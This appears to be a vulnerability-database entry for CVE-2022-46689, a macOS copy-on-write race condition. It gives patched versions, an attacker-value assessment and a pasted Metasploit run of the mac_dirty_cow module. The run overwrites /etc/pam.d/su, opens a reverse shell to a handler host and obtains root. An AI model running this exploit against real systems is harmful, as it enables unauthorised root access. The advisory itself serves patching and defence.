High
CVE-2022-46689
CVE-2022-46689
Description
A race condition was addressed with additional validation. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. An app may be able to execute arbitrary code with kernel privileges.
Add Assessment
Technical Analysis
Description
This vulnerability is the macOS equivalent of the Dirty Cow vulnerability and allows for an unprivileged user to execute code as root. The vulnerability on linux is described as: “A race condition was found in the way the kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.”
Attacker Value & Exploitation
This issue was fixed in:
- tvOS 16.2
- macOS Monterey 12.6.2
- macOS Ventura 13.1
- macOS Big Sur 11.7.2
- iOS 15.7.2
- iPadOS 15.7.2
- iOS 16.2
- iPadOS 16.2
- watchOS 9.2.
Numerous recent versions of Apple products affected makes this quite valuable for attackers. It’s not everyday we see such a reliable LPE in current versions of macOS. The vuln requires user authentication to exploit and would pair nicely with a successful phishing attempt to compromise an entire macOS environment. A metasploit module has been released for this vuln making exploitation trivial, be sure to patch!
msf6 exploit(osx/local/mac_dirty_cow) > run [*] Started reverse TCP handler on 172.16.199.1:4446 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [*] Writing '/tmp/.wNDx86' (17204 bytes) ... [*] Writing '/tmp/.TKIGnTw0l' (51392 bytes) ... [*] Executing exploit '/tmp/.TKIGnTw0l /etc/pam.d/su /tmp/.DfoZanro' [*] Exploit result: Testing for 10 seconds... RO mapping was modified [*] Running cmd: echo '/tmp/.wNDx86 & disown' | su [*] Executing exploit (restoring) '/tmp/.TKIGnTw0l /etc/pam.d/su /tmp/.aclP0u' [*] Exploit result: Testing for 10 seconds... RO mapping was modified [+] Deleted /tmp/.wNDx86 [+] Deleted /tmp/.aclP0u [+] Deleted /tmp/.DfoZanro [+] Deleted /tmp/.TKIGnTw0l [*] Command shell session 2 opened (172.16.199.1:4446 -> 172.16.199.130:49802) at 2023-02-01 16:10:54 -0500 options /bin/sh: line 29: options: command not found id uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae),701(com.apple.sharepoint.group.1) uname -a Darwin msfusers-Mac.local 22.0.0 Darwin Kernel Version 22.0.0: Tue May 24 20:31:35 PDT 2022; root:xnu-8792.0.50.111.3~5/RELEASE_X86_64 x86_64
CVSS V3 Severity and Metrics
General Information
Vendors
- apple
Products
- ipados,
- iphone os,
- macos,
- safari,
- tvos,
- watchos
Metasploit Modules
References
Exploit
A PoC added here by the AKB Worker must have at least 2 GitHub stars.
